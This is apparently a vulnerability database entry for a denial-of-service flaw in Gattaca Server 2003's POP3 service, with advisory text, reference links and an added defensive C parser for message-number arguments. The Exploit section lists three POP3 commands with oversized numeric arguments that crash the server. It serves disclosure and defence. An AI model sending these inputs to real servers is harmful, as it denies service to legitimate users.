Gattaca Server 2003 Multiple Denial of Service Vulnerabilities

Vulnerability ID: 1108052    Vulnerability type: Other
Published: 2004-07-15    Updated: 2006-01-24
CVE ID: CVE-2004-2520    CNNVD-ID: CNNVD-200412-1136
Platform: Multiple    CVSS score: 4.0
|Vulnerability source
https://www.exploit-db.com/exploits/24283
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1136
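|Vulnerability details
The POP3 protocol handling in Gattaca Server 2003 version 1.1.10.0 contains a vulnerability. A remote authenticated user can cause a denial of service (application crash) by supplying a very large numeric value to the (1) LIST, (2) RETR, or (3) UIDL command.
|Exploit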
source: http://www.securityfocus.com/bid/10728/info
 
It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.
 
These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.
 
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities.

list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405
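
Added example, not code from the advisory or from Gattaca Server: a defensive parser for the message-number argument of LIST, RETR and UIDL that refuses values like those above before they reach message lookup. It assumes the crash stems from unchecked handling of the numeric argument (the page does not state the root cause); `parse_msg_number` and `msg_count` are hypothetical names.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse the message-number argument of LIST/RETR/UIDL (hypothetical helper).
 * Returns the number (1..msg_count), or 0 if the command must be answered
 * with "-ERR". msg_count is the number of messages in the maildrop. */
unsigned long parse_msg_number(const char *arg, unsigned long msg_count)
{
    size_t len, i;
    char *end;
    unsigned long n;

    if (arg == NULL)
        return 0;
    len = strlen(arg);
    /* Cap the length first: 10 digits covers any 32-bit message count. */
    if (len == 0 || len > 10)
        return 0;
    /* Digits only: strtoul alone would accept "-1", "+5", " 7". */
    for (i = 0; i < len; i++)
        if (!isdigit((unsigned char)arg[i]))
            return 0;

    errno = 0;
    n = strtoul(arg, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return 0;
    /* Range check against the maildrop before the value is used as an index. */
    if (n == 0 || n > msg_count)
        return 0;
    return n;
}

int main(void)
{
    /* Constructed inputs; the first two numbers are the ones in the advisory. */
    const char *args[] = { "99999999999999999999999", "98409583490583409539405",
                           "4294967296", "-1", "0", "6", "3" };
    size_t i;

    for (i = 0; i < sizeof args / sizeof args[0]; i++)
        printf("%-24s -> %lu\n", args[i], parse_msg_number(args[i], 5));
    return 0;
}
```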
|References

Source: www.gattaca-server.com
Link: http://www.gattaca-server.com/cgi-bin/yabb/YaBB.pl?board=gattaca_discussion;action=display;num=1091194176;start=0#0
Source: XF
Name: gattaca-pop3-dos(16703)
Link: http://xforce.iss.net/xforce/xfdb/16703
Source: BID
Name: 10728
Link: http://www.securityfocus.com/bid/10728
Source: OSVDB
Name: 7925
Link: http://www.osvdb.org/7925
Source: SECTRACK
Name: 1010703
Link: http://securitytracker.com/id?1010703
Source: SECUNIA
Name: 12071
Link: http://secunia.com/advisories/12071
Source: members.lycos.co.uk
Link: http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt